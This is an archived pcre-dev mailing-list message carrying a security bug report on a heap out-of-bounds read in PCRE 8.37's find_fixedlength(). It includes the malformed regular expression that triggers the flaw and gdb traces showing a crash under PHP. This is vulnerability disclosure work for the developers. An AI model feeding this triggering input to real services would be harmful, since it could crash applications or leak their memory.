[pcre-dev] [Bug 1651] New: PCRE Library Heap Overflow Vulner…

Páxina inicial
Borrar esta mensaxe
Autor: admin
Data:  
Para: pcre-dev
Temas novos: [pcre-dev] [Bug 1651] PCRE Library Heap Overflow Vulnerability in find_fixedlength(), [pcre-dev] [Bug 1651] PCRE Library Heap Overflow Vulnerability in find_fixedlength(), [pcre-dev] [Bug 1651] PCRE Library Heap Overflow Vulnerability in find_fixedlength()
Asunto: [pcre-dev] [Bug 1651] New: PCRE Library Heap Overflow Vulnerability in find_fixedlength()
https://bugs.exim.org/show_bug.cgi?id=1651

            Bug ID: 1651
           Summary: PCRE Library Heap Overflow Vulnerability in
                    find_fixedlength()
           Product: PCRE
           Version: 8.37
          Hardware: All
                OS: All
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: rubymail@???
                CC: pcre-dev@???


Created attachment 820
--> https://bugs.exim.org/attachment.cgi?id=820&action=edit
poc to trigger the crash using php.

I. Summary
PCRE library is prone to a vulnerability which leads to Heap Overflow.
During subpattern calculation of a malformed regular expression, an offset that
is used as an array index is fully controlled and can be large enough so that
unexpected heap memory regions are accessed.
One could at least exploit this issue to read objects nearby of the affected
application's memory.
Such information disclosure may also be used to bypass memory protection method
such as ASLR.
------------------------------------------------------------------
II. Description
Latest version of PCRE is prone to a Heap Overflow vulnerability which could
caused by the following regular expression.

/(?=It_should_be_long_enough_so_that_the_calculation_of_subpattern_triggers_the_memory_reading_out_of_bound.(?<=(?1))|(?=(.))))/

======Following test is conducted under Ubunut 14.10 x64======
$ gdb ./lt-pcretest
(gdb) r
PCRE version 8.37 2015-04-28

re>
/(?=It_should_be_long_enough_so_that_the_calculation_of_subpattern_triggers_the_memory_reading_out_of_bound.(?<=(?1))|(?=(.))))/

Breakpoint 1, find_fixedlength (code=code@entry=0x6278a8 "|", utf=<optimized
out>, atend=atend@entry=1,
    cd=cd@entry=0x7fffffffaf20, recurses=recurses@entry=0x0) at
pcre_compile.c:1779
1779        do ce += GET(ce, 1); while (*ce == OP_ALT);           /* End
subpattern */


(gdb) x/3bx  ce
0x6277d1:       0x00    0xf6    0x7d
(gdb) n
1780        if (cc > cs && cc < ce) return -1;                    /* Recursion
*/
(gdb) x/wx  ce
0x636e4e:       0x00000000
(gdb) info proc mappings
Start Addr           End Addr       Size     Offset objfile
  0x60f000           0x63c000    0x2d000        0x0 [heap]
==============================================================


For GET operation, it is 0xf67d to be used as the index number, just like
ce=ce[0xf67d].
After GET, ce has already pointed to memory regions out of bound.
The reason why there is no memory violation is that heap memory block happens
to be large enough to hold the out of bound accessing.
If we try this with other program wrapped with pcre with different memory
layout, say PHP, memory crash will occur.

======Following test is conducted under Ubunut 14.10 x64======
$ gdb ./php
(gdb) r poc.php

Breakpoint 1, find_fixedlength (code=code@entry=0x1035178 "|", utf=0,
atend=atend@entry=1, cd=cd@entry=0x7fffffff9710,
    recurses=recurses@entry=0x0) at
/home/jack/fuzzing/php-5.6.10/ext/pcre/pcrelib/pcre_compile.c:1779
1779        do ce += GET(ce, 1); while (*ce == OP_ALT);           /* End
subpattern */


(gdb) x/3bx ce
0x10350a1:      0x00    0xf6    0x7d
(gdb) n


Program received signal SIGSEGV, Segmentation fault.
0x000000000045dbb2 in find_fixedlength (code=code@entry=0x1035178 "|", utf=0,
atend=atend@entry=1,
    cd=cd@entry=0x7fffffff9710, recurses=recurses@entry=0x0)
    at /home/jack/fuzzing/php-5.6.10/ext/pcre/pcrelib/pcre_compile.c:1779
1779        do ce += GET(ce, 1); while (*ce == OP_ALT);           /* End
subpattern */


(gdb) x/wx ce
0x104471e:      Cannot access memory at address 0x104471e
(gdb) info proc mappings
Start Addr           End Addr       Size     Offset objfile
  0xe9a000          0x1044000   0x1aa000        0x0 [heap]
==============================================================


------------------------------------------------------------------
III. Impact
Heap Overflow
------------------------------------------------------------------
IV. Affected
PCRE version 8.37 is confirmed to be vulnerable.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.

--
You are receiving this mail because:
You are on the CC list for the bug.